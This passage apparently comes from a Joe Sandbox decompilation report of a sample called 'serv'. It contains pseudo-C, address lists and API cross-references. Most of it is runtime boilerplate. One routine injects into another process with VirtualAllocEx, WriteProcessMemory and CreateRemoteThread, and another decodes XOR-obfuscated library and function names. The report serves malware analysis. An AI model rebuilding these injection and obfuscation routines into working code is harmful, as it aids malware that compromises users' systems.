                                                                    							 *((intOrPtr*)(_t72 + 0x10)) = 1;
                                                                    							E0041A8E0(_t51);
                                                                    						}
                                                                    					}
                                                                    					E0041A8E0(_t53);
                                                                    					return  *((intOrPtr*)(_t72 + 0xc));
                                                                    				}
                                                                    			}





































                                                                    0x00404920
                                                                    0x00404932
                                                                    0x0040493b
                                                                    0x0040493f
                                                                    0x00404a77
                                                                    0x00404945
                                                                    0x00404946
                                                                    0x0040495a
                                                                    0x0040495f
                                                                    0x00404966
                                                                    0x0040496a
                                                                    0x00404994
                                                                    0x00404999
                                                                    0x0040499e
                                                                    0x004049a2
                                                                    0x004049a7
                                                                    0x004049ac
                                                                    0x004049b0
                                                                    0x004049b5
                                                                    0x004049ba
                                                                    0x004049bf
                                                                    0x004049c4
                                                                    0x004049cf
                                                                    0x004049d3
                                                                    0x004049d7
                                                                    0x004049dd
                                                                    0x004049f1
                                                                    0x004049f6
                                                                    0x004049fa
                                                                    0x004049ff
                                                                    0x00404a04
                                                                    0x00404a09
                                                                    0x00404a0d
                                                                    0x00404a11
                                                                    0x00404a15
                                                                    0x00404a1a
                                                                    0x00404a1f
                                                                    0x00404a35
                                                                    0x00404a50
                                                                    0x00404a58
                                                                    0x00404a58
                                                                    0x00404a35
                                                                    0x00404a5e
                                                                    0x00404a6d
                                                                    0x00404a6d

                                                                    APIs
                                                                    • lstrlen.KERNEL32(?,?,0000042A,00000000,?), ref: 0040494B
                                                                      • Part of subcall function 0041BC70: VirtualAllocEx.KERNELBASE(?,?,?,?,?,00000000,?), ref: 0041BCFB
                                                                      • Part of subcall function 0041BD10: WriteProcessMemory.KERNELBASE(?,?,?,?,?,0000042A,00000000,?), ref: 0041BDB4
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00404A2C
                                                                      • Part of subcall function 0041BE50: CreateRemoteThread.KERNELBASE(?,?,?,?,?,?,?,0000042A,00000000,?), ref: 0041BEFE
                                                                      • Part of subcall function 0041A8E0: FindCloseChangeNotification.KERNELBASE(?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041A950
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressAllocChangeCloseCreateFindMemoryNotificationProcProcessRemoteThreadVirtualWritelstrlen
                                                                    • String ID: #$=$?$A$G$J$L$Q$Q$Q$b$c$i
                                                                    • API String ID: 72935852-4186992372
                                                                    • Opcode ID: 262f5ea2f6da85a749cb0306011de52f5d49b5a9e64993040fb017a04ae87bb1
                                                                    • Instruction ID: ccf4b14a2e2ce1fdf5d6933e9844bf3be8dad8627baa7f4f7736dfb343f8383b
                                                                    • Opcode Fuzzy Hash: 262f5ea2f6da85a749cb0306011de52f5d49b5a9e64993040fb017a04ae87bb1
                                                                    • Instruction Fuzzy Hash: BE41C77120D3C0ADE311EA655844B9BBFD88FA6748F04195DF6C867283C2A9D648C7BF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 57%
                                                                    			E00429C54(void* __ebx, signed int __edi, signed int __esi, void* __eflags, intOrPtr _a8, intOrPtr _a12, long _a16) {
                                                                    				intOrPtr _v0;
                                                                    				signed int _v4;
                                                                    				long _v8;
                                                                    				long _v12;
                                                                    				intOrPtr _v20;
                                                                    				signed int _v24;
                                                                    				intOrPtr _v28;
                                                                    				char _v32;
                                                                    				char _v292;
                                                                    				char* _v296;
                                                                    				intOrPtr _t38;
                                                                    				intOrPtr* _t39;
                                                                    				void* _t47;
                                                                    				void* _t62;
                                                                    				long _t63;
                                                                    				long _t68;
                                                                    				void* _t85;
                                                                    				signed int _t95;
                                                                    				char* _t96;
                                                                    				signed int _t97;
                                                                    				signed int _t99;
                                                                    				void* _t100;
                                                                    				signed int _t101;
                                                                    				signed int _t107;
                                                                    
                                                                    				_t99 = __esi;
                                                                    				_t95 = __edi;
                                                                    				_push(0x118);
                                                                    				_push(0x431518);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t38 =  *0x446f24; // 0x81a0b55c
                                                                    				_v28 = _t38;
                                                                    				_t39 =  *0x448590; // 0x0
                                                                    				if(_t39 == 0) {
                                                                    					if(_a8 == 1) {
                                                                    						_t96 = "Buffer overrun detected!";
                                                                    						_v296 = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
                                                                    						_t100 = 0xb9;
                                                                    					} else {
                                                                    						_t96 = "Unknown security failure detected!";
                                                                    						_v296 = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
                                                                    						_t100 = 0xd4;
                                                                    					}
                                                                    					_v32 = 0;
                                                                    					if(GetModuleFileNameA(0,  &_v292, 0x104) == 0) {
                                                                    						E00423FB0( &_v292, "<program name unknown>");
                                                                    					}
                                                                    					_t81 =  &_v292;
                                                                    					if(E00422F20( &_v292) + 0xb > 0x3c) {
                                                                    						_t81 = E00422F20( &_v292) +  &_v292 - 0x31;
                                                                    						E004281C0(E00422F20( &_v292) +  &_v292 - 0x31, "...", 3);
                                                                    						_t107 = _t107 + 0x10;
                                                                    					}
                                                                    					_t47 = E00422F20(_t81);
                                                                    					_pop(_t85);
                                                                    					E00422920(_t47 + _t100 + 0x0000000c + 0x00000003 & 0xfffffffc, _t85);
                                                                    					_v24 = _t107;
                                                                    					_t99 = _t107;
                                                                    					E00423FB0(_t99, _t96);
                                                                    					_t95 = "\n\n";
                                                                    					E00423FC0(_t99, _t95);
                                                                    					E00423FC0(_t99, "Program: ");
                                                                    					E00423FC0(_t99, _t81);
                                                                    					E00423FC0(_t99, _t95);
                                                                    					E00423FC0(_t99, _v296);
                                                                    					_push(0x12010);
                                                                    					_push("Microsoft Visual C++ Runtime Library");
                                                                    					_push(_t99);
                                                                    					E00429202();
                                                                    					_t107 = _t107 + 0x3c;
                                                                    				} else {
                                                                    					_v4 = 0;
                                                                    					 *_t39(_a8, _a12);
                                                                    					_pop(_t85);
                                                                    					_v4 = _v4 | 0xffffffff;
                                                                    				}
                                                                    				E0042552E(3);
                                                                    				asm("int3");
                                                                    				_push(_t85);
                                                                    				_push(_t85);
                                                                    				_push(_t99);
                                                                    				_t101 = _v8;
                                                                    				_v24 = _v4;
                                                                    				_push(_t95);
                                                                    				_v20 = _v0;
                                                                    				_t62 = E00428AF0(_t101);
                                                                    				_t97 = _t95 | 0xffffffff;
                                                                    				if(_t62 != _t97) {
                                                                    					_t63 = SetFilePointer(_t62, _v12,  &_v8, _a16);
                                                                    					_v12 = _t63;
                                                                    					if(_t63 != _t97 || GetLastError() == 0) {
                                                                    						 *( *((intOrPtr*)(0x44b140 + (_t101 >> 5) * 4)) + 4 + ((_t101 & 0x0000001f) + (_t101 & 0x0000001f) * 8) * 4) =  *( *((intOrPtr*)(0x44b140 + (_t101 >> 5) * 4)) + 4 + ((_t101 & 0x0000001f) + (_t101 & 0x0000001f) * 8) * 4) & 0x000000fd;
                                                                    						_t68 = _v12;
                                                                    					} else {
                                                                    						E00426868(_t69);
                                                                    						goto L17;
                                                                    					}
                                                                    				} else {
                                                                    					 *((intOrPtr*)(E00426856())) = 9;
                                                                    					L17:
                                                                    					_t68 = _t97;
                                                                    				}
                                                                    				return _t68;
                                                                    			}



























                                                                    0x00429c54
                                                                    0x00429c54
                                                                    0x00429c54
                                                                    0x00429c59
                                                                    0x00429c5e
                                                                    0x00429c63
                                                                    0x00429c68
                                                                    0x00429c6b
                                                                    0x00429c74
                                                                    0x00429c99
                                                                    0x00429cb1
                                                                    0x00429cb6
                                                                    0x00429cc0
                                                                    0x00429c9b
                                                                    0x00429c9b
                                                                    0x00429ca0
                                                                    0x00429caa
                                                                    0x00429caa
                                                                    0x00429cc5
                                                                    0x00429cdd
                                                                    0x00429ceb
                                                                    0x00429cf1
                                                                    0x00429cf2
                                                                    0x00429d07
                                                                    0x00429d1c
                                                                    0x00429d26
                                                                    0x00429d2b
                                                                    0x00429d2b
                                                                    0x00429d2f
                                                                    0x00429d34
                                                                    0x00429d3f
                                                                    0x00429d44
                                                                    0x00429d47
                                                                    0x00429d4b
                                                                    0x00429d50
                                                                    0x00429d57
                                                                    0x00429d62
                                                                    0x00429d69
                                                                    0x00429d70
                                                                    0x00429d7c
                                                                    0x00429d81
                                                                    0x00429d86
                                                                    0x00429d8b
                                                                    0x00429d8c
                                                                    0x00429d91
                                                                    0x00429c76
                                                                    0x00429c76
                                                                    0x00429c7f
                                                                    0x00429c82
                                                                    0x00429c83
                                                                    0x00429c83
                                                                    0x00429d96
                                                                    0x00429d9b
                                                                    0x00429d9f
                                                                    0x00429da0
                                                                    0x00429da4
                                                                    0x00429da5
                                                                    0x00429da8
                                                                    0x00429dae
                                                                    0x00429db0
                                                                    0x00429db3
                                                                    0x00429db8
                                                                    0x00429dbe
                                                                    0x00429dd8
                                                                    0x00429de0
                                                                    0x00429de3
                                                                    0x00429e12
                                                                    0x00429e15
                                                                    0x00429def
                                                                    0x00429df0
                                                                    0x00000000
                                                                    0x00429df5
                                                                    0x00429dc0
                                                                    0x00429dc5
                                                                    0x00429df6
                                                                    0x00429df6
                                                                    0x00429df8
                                                                    0x00429e1e

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00431518,00000118,00428369,00000001,00000000,004311F8,00000008,00426BA0,00000000,00000000,00000000), ref: 00429CD5
                                                                    • _strcat.LIBCMT ref: 00429CEB
                                                                    • _strlen.LIBCMT ref: 00429CFB
                                                                    • _strlen.LIBCMT ref: 00429D0C
                                                                    • _strncpy.LIBCMT ref: 00429D26
                                                                    • _strlen.LIBCMT ref: 00429D2F
                                                                    • _strcat.LIBCMT ref: 00429D4B
                                                                    Strings
                                                                    • Unknown security failure detected!, xrefs: 00429C9B
                                                                    • A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated., xrefs: 00429CB6
                                                                    • <program name unknown>, xrefs: 00429CDF
                                                                    • A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated., xrefs: 00429CA0
                                                                    • Buffer overrun detected!, xrefs: 00429CB1, 00429D49
                                                                    • ..., xrefs: 00429D20
                                                                    • Microsoft Visual C++ Runtime Library, xrefs: 00429D86
                                                                    • Program: , xrefs: 00429D5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                    • String ID: ...$<program name unknown>$A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated.$A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated.$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                    • API String ID: 3058806289-1010210193
                                                                    • Opcode ID: 54a1af11615edc5cb99fd5eabcd91fc2120b0ec5e023a510fb0467e6766a05b0
                                                                    • Instruction ID: 7cd09d1992efc637761828a68cb66a96c96519ae212bd23a34ed079d71f708ea
                                                                    • Opcode Fuzzy Hash: 54a1af11615edc5cb99fd5eabcd91fc2120b0ec5e023a510fb0467e6766a05b0
                                                                    • Instruction Fuzzy Hash: 6F31EF72B002246BDB11AB61BD42EDE36B89F08318F51055FB004A6286DF7CDE418B9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E00423D97() {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t7;
                                                                    				char _t9;
                                                                    				char _t10;
                                                                    				long _t11;
                                                                    				_Unknown_base(*)()* _t15;
                                                                    				void* _t21;
                                                                    				struct HINSTANCE__* _t25;
                                                                    				intOrPtr _t29;
                                                                    				char _t31;
                                                                    
                                                                    				if(E004240A8() != 0) {
                                                                    					_push(_t29);
                                                                    					_t25 = GetModuleHandleA("kernel32.dll");
                                                                    					__eflags = _t25;
                                                                    					if(_t25 != 0) {
                                                                    						_t29 =  *0x430044;
                                                                    						 *0x4480f0 = GetProcAddress(_t25, "FlsAlloc");
                                                                    						"PHqtpHqt0Hqt" = GetProcAddress(_t25, "FlsGetValue");
                                                                    						"pHqt0Hqt" = GetProcAddress(_t25, "FlsSetValue");
                                                                    						_t15 = GetProcAddress(_t25, "FlsFree");
                                                                    						__eflags = "PHqtpHqt0Hqt";
                                                                    						 *0x4480fc = _t15;
                                                                    						if("PHqtpHqt0Hqt" == 0) {
                                                                    							"PHqtpHqt0Hqt" =  *0x43007c;
                                                                    							"pHqt0Hqt" =  *0x430078;
                                                                    							 *0x4480f0 = E00423BB9;
                                                                    							 *0x4480fc =  *0x430074;
                                                                    						}
                                                                    					}
                                                                    					_t7 =  *0x4480f0(E00423C50);
                                                                    					__eflags = _t7 - 0xffffffff;
                                                                    					 *0x446f28 = _t7;
                                                                    					if(__eflags == 0) {
                                                                    						L9:
                                                                    						E00423BC2();
                                                                    						_t9 = 0;
                                                                    						__eflags = 0;
                                                                    					} else {
                                                                    						_push(0x8c);
                                                                    						_push(1);
                                                                    						_t10 = E00427472(_t21, 1, _t29, __eflags);
                                                                    						_t31 = _t10;
                                                                    						__eflags = _t31;
                                                                    						if(_t31 == 0) {
                                                                    							goto L9;
                                                                    						} else {
                                                                    							_push(_t31);
                                                                    							_push( *0x446f28);
                                                                    							"pHqt0Hqt"();
                                                                    							__eflags = _t10;
                                                                    							if(_t10 == 0) {
                                                                    								goto L9;
                                                                    							} else {
                                                                    								 *((intOrPtr*)(_t31 + 0x54)) = 0x447678;
                                                                    								 *((intOrPtr*)(_t31 + 0x14)) = 1;
                                                                    								_t11 = GetCurrentThreadId();
                                                                    								 *(_t31 + 4) =  *(_t31 + 4) | 0xffffffff;
                                                                    								 *_t31 = _t11;
                                                                    								_t9 = 1;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					return _t9;
                                                                    				} else {
                                                                    					E00423BC2();
                                                                    					return 0;
                                                                    				}
                                                                    			}














                                                                    0x00423d9e
                                                                    0x00423da8
                                                                    0x00423db5
                                                                    0x00423db7
                                                                    0x00423db9
                                                                    0x00423dbb
                                                                    0x00423dcf
                                                                    0x00423ddc
                                                                    0x00423de9
                                                                    0x00423dee
                                                                    0x00423df0
                                                                    0x00423df7
                                                                    0x00423dfc
                                                                    0x00423e03
                                                                    0x00423e0d
                                                                    0x00423e17
                                                                    0x00423e21
                                                                    0x00423e21
                                                                    0x00423dfc
                                                                    0x00423e2b
                                                                    0x00423e31
                                                                    0x00423e34
                                                                    0x00423e39
                                                                    0x00423e7c
                                                                    0x00423e7c
                                                                    0x00423e81
                                                                    0x00423e81
                                                                    0x00423e3b
                                                                    0x00423e3d
                                                                    0x00423e43
                                                                    0x00423e44
                                                                    0x00423e49
                                                                    0x00423e4b
                                                                    0x00423e4f
                                                                    0x00000000
                                                                    0x00423e51
                                                                    0x00423e51
                                                                    0x00423e52
                                                                    0x00423e58
                                                                    0x00423e5e
                                                                    0x00423e60
                                                                    0x00000000
                                                                    0x00423e62
                                                                    0x00423e62
                                                                    0x00423e69
                                                                    0x00423e6c
                                                                    0x00423e72
                                                                    0x00423e76
                                                                    0x00423e78
                                                                    0x00423e78
                                                                    0x00423e60
                                                                    0x00423e4f
                                                                    0x00423e85
                                                                    0x00423da0
                                                                    0x00423da0
                                                                    0x00423da7
                                                                    0x00423da7

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,74714DE0,00000000,00422D4F,?,004303A8,00000060), ref: 00423DAF
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00423DC7
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00423DD4
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00423DE1
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00423DEE
                                                                    • FlsAlloc.KERNEL32(00423C50,?,004303A8,00000060), ref: 00423E2B
                                                                    • FlsSetValue.KERNEL32(00000000,?,004303A8,00000060), ref: 00423E58
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00423E6C
                                                                      • Part of subcall function 00423BC2: FlsFree.KERNEL32(00000002,00423E81,?,004303A8,00000060), ref: 00423BCD
                                                                      • Part of subcall function 00423BC2: RtlDeleteCriticalSection.NTDLL(00000000), ref: 0042410C
                                                                      • Part of subcall function 00423BC2: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00424136
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll$Mqt`7utIqt
                                                                    • API String ID: 2635119114-1287002404
                                                                    • Opcode ID: b0cfdf15e8502374e3aa62110b111cb4db541f1c987ff244a1c3e506358f05ea
                                                                    • Instruction ID: 8b3271458602b4f27c13399e64746306443c1ffdb750162da11a79dbd1cf2b8b
                                                                    • Opcode Fuzzy Hash: b0cfdf15e8502374e3aa62110b111cb4db541f1c987ff244a1c3e506358f05ea
                                                                    • Instruction Fuzzy Hash: 082183747103219BD7209F35BC05A1A7EF4EB56B51752923FE664C22A1EBBC89088B5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 29%
                                                                    			E00429202(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
                                                                    				char _v8;
                                                                    				signed char _v12;
                                                                    				char _v20;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr* _t14;
                                                                    				intOrPtr* _t17;
                                                                    				void* _t19;
                                                                    				_Unknown_base(*)()* _t23;
                                                                    				_Unknown_base(*)()* _t26;
                                                                    				void* _t28;
                                                                    				struct HINSTANCE__* _t31;
                                                                    				void* _t33;
                                                                    
                                                                    				_t28 = 0;
                                                                    				_t33 =  *0x4484a0 - _t28; // 0x0
                                                                    				if(_t33 != 0) {
                                                                    					L6:
                                                                    					_t13 =  *0x4484ac; // 0x0
                                                                    					if(_t13 == 0) {
                                                                    						L14:
                                                                    						_t14 =  *0x4484a4; // 0x0
                                                                    						if(_t14 != 0) {
                                                                    							_t28 =  *_t14();
                                                                    							if(_t28 != 0) {
                                                                    								_t17 =  *0x4484a8; // 0x0
                                                                    								if(_t17 != 0) {
                                                                    									_t28 =  *_t17(_t28);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						L18:
                                                                    						return  *0x4484a0(_t28, _a4, _a8, _a12);
                                                                    					}
                                                                    					_t19 =  *_t13();
                                                                    					if(_t19 == 0) {
                                                                    						L10:
                                                                    						if( *0x448274 < 4) {
                                                                    							_a14 = _a14 | 0x00000004;
                                                                    						} else {
                                                                    							_a14 = _a14 | 0x00000020;
                                                                    						}
                                                                    						goto L18;
                                                                    					}
                                                                    					_push( &_v8);
                                                                    					_push(0xc);
                                                                    					_push( &_v20);
                                                                    					_push(1);
                                                                    					_push(_t19);
                                                                    					if( *0x4484b0() == 0 || (_v12 & 0x00000001) == 0) {
                                                                    						goto L10;
                                                                    					} else {
                                                                    						goto L14;
                                                                    					}
                                                                    				}
                                                                    				_t31 = LoadLibraryA("user32.dll");
                                                                    				if(_t31 == 0) {
                                                                    					L12:
                                                                    					return 0;
                                                                    				}
                                                                    				_t23 = GetProcAddress(_t31, "MessageBoxA");
                                                                    				 *0x4484a0 = _t23;
                                                                    				if(_t23 == 0) {
                                                                    					goto L12;
                                                                    				} else {
                                                                    					 *0x4484a4 = GetProcAddress(_t31, "GetActiveWindow");
                                                                    					 *0x4484a8 = GetProcAddress(_t31, "GetLastActivePopup");
                                                                    					if( *0x448268 == 2) {
                                                                    						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
                                                                    						 *0x4484b0 = _t26;
                                                                    						if(_t26 != 0) {
                                                                    							 *0x4484ac = GetProcAddress(_t31, "GetProcessWindowStation");
                                                                    						}
                                                                    					}
                                                                    					goto L6;
                                                                    				}
                                                                    			}















                                                                    0x00429209
                                                                    0x0042920b
                                                                    0x00429213
                                                                    0x00429282
                                                                    0x00429282
                                                                    0x00429289
                                                                    0x004292c7
                                                                    0x004292c7
                                                                    0x004292ce
                                                                    0x004292d2
                                                                    0x004292d6
                                                                    0x004292d8
                                                                    0x004292df
                                                                    0x004292e4
                                                                    0x004292e4
                                                                    0x004292df
                                                                    0x004292d6
                                                                    0x004292e6
                                                                    0x00000000
                                                                    0x004292f0
                                                                    0x0042928b
                                                                    0x0042928f
                                                                    0x004292ae
                                                                    0x004292b5
                                                                    0x004292c1
                                                                    0x004292b7
                                                                    0x004292b7
                                                                    0x004292b7
                                                                    0x00000000
                                                                    0x004292b5
                                                                    0x00429294
                                                                    0x00429295
                                                                    0x0042929a
                                                                    0x0042929b
                                                                    0x0042929d
                                                                    0x004292a6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004292a6
                                                                    0x00429220
                                                                    0x00429224
                                                                    0x004292bd
                                                                    0x00000000
                                                                    0x004292bd
                                                                    0x00429236
                                                                    0x0042923a
                                                                    0x0042923f
                                                                    0x00000000
                                                                    0x00429241
                                                                    0x0042924f
                                                                    0x0042925d
                                                                    0x00429262
                                                                    0x0042926a
                                                                    0x0042926e
                                                                    0x00429273
                                                                    0x0042927d
                                                                    0x0042927d
                                                                    0x00429273
                                                                    0x00000000
                                                                    0x00429262

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(user32.dll,00430B00,?,?), ref: 0042921A
                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00429236
                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00429247
                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00429254
                                                                    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0042926A
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042927B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                    • API String ID: 2238633743-1612076079
                                                                    • Opcode ID: ef1b00b40ee4f8fce257c0a2842e4dcc60fc60ea9a057ff8d7535375d965edc5
                                                                    • Instruction ID: 446edb52bc3954b56b2ce01bcc63d0f2e67b9e6c886cd8b1c26a0e117dc1792e
                                                                    • Opcode Fuzzy Hash: ef1b00b40ee4f8fce257c0a2842e4dcc60fc60ea9a057ff8d7535375d965edc5
                                                                    • Instruction Fuzzy Hash: 59218E35704227FADB119FB5AC84B6F3BA8AB46754F4404BEE501D6191EB78DC00DA3D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041E5F0() {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				struct HINSTANCE__* _t24;
                                                                    				void* _t28;
                                                                    				CHAR* _t30;
                                                                    
                                                                    				_t24 =  *0x447d80; // 0x775c0000
                                                                    				if(_t24 == 0) {
                                                                    					 *_t30 = 0x52;
                                                                    					_v11 = 0x54;
                                                                    					_v10 = 0x42;
                                                                    					_v9 = 0x55;
                                                                    					_v8 = 0x14;
                                                                    					_v7 = 0x15;
                                                                    					_v6 = 9;
                                                                    					_v5 = 0x43;
                                                                    					_v4 = 0x4b;
                                                                    					_v3 = 0x4b;
                                                                    					_v2 = 0x27;
                                                                    					do {
                                                                    						_t30[_t24] = _t30[_t24] ^ 0x00000027;
                                                                    						_t24 =  &(_t24->i);
                                                                    					} while (_t24 < 0xb);
                                                                    					_t24 = LoadLibraryA(_t30);
                                                                    					 *0x447d80 = _t24;
                                                                    				}
                                                                    				if( *0x44aec8 == 0) {
                                                                    					 *_t30 = 0x4f;
                                                                    					_v11 = 0x4b;
                                                                    					_v10 = 0x48;
                                                                    					_v9 = 0x4a;
                                                                    					_v8 = 0x51;
                                                                    					_v7 = 0x56;
                                                                    					_v6 = 0x4c;
                                                                    					_v5 = 0x5e;
                                                                    					_v4 = 0x79;
                                                                    					_v3 = 0x38;
                                                                    					_t28 = 0;
                                                                    					do {
                                                                    						_t30[_t28] = _t30[_t28] ^ 0x00000038;
                                                                    						_t28 = _t28 + 1;
                                                                    					} while (_t28 < 0xa);
                                                                    					_t24 = GetProcAddress(_t24, _t30);
                                                                    					 *0x44aec8 = _t24;
                                                                    					if(_t24 == 0) {
                                                                    						_t24 =  *0x447d7c; // 0x1
                                                                    						if(_t24 != 0) {
                                                                    							return E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t24;
                                                                    			}
















                                                                    0x0041e5f0
                                                                    0x0041e5fa
                                                                    0x0041e5fc
                                                                    0x0041e600
                                                                    0x0041e605
                                                                    0x0041e60a
                                                                    0x0041e60f
                                                                    0x0041e614
                                                                    0x0041e619
                                                                    0x0041e61e
                                                                    0x0041e623
                                                                    0x0041e628
                                                                    0x0041e62d
                                                                    0x0041e632
                                                                    0x0041e632
                                                                    0x0041e636
                                                                    0x0041e637
                                                                    0x0041e640
                                                                    0x0041e646
                                                                    0x0041e646
                                                                    0x0041e653
                                                                    0x0041e655
                                                                    0x0041e659
                                                                    0x0041e65e
                                                                    0x0041e663
                                                                    0x0041e668
                                                                    0x0041e66d
                                                                    0x0041e672
                                                                    0x0041e677
                                                                    0x0041e67c
                                                                    0x0041e681
                                                                    0x0041e686
                                                                    0x0041e688
                                                                    0x0041e688
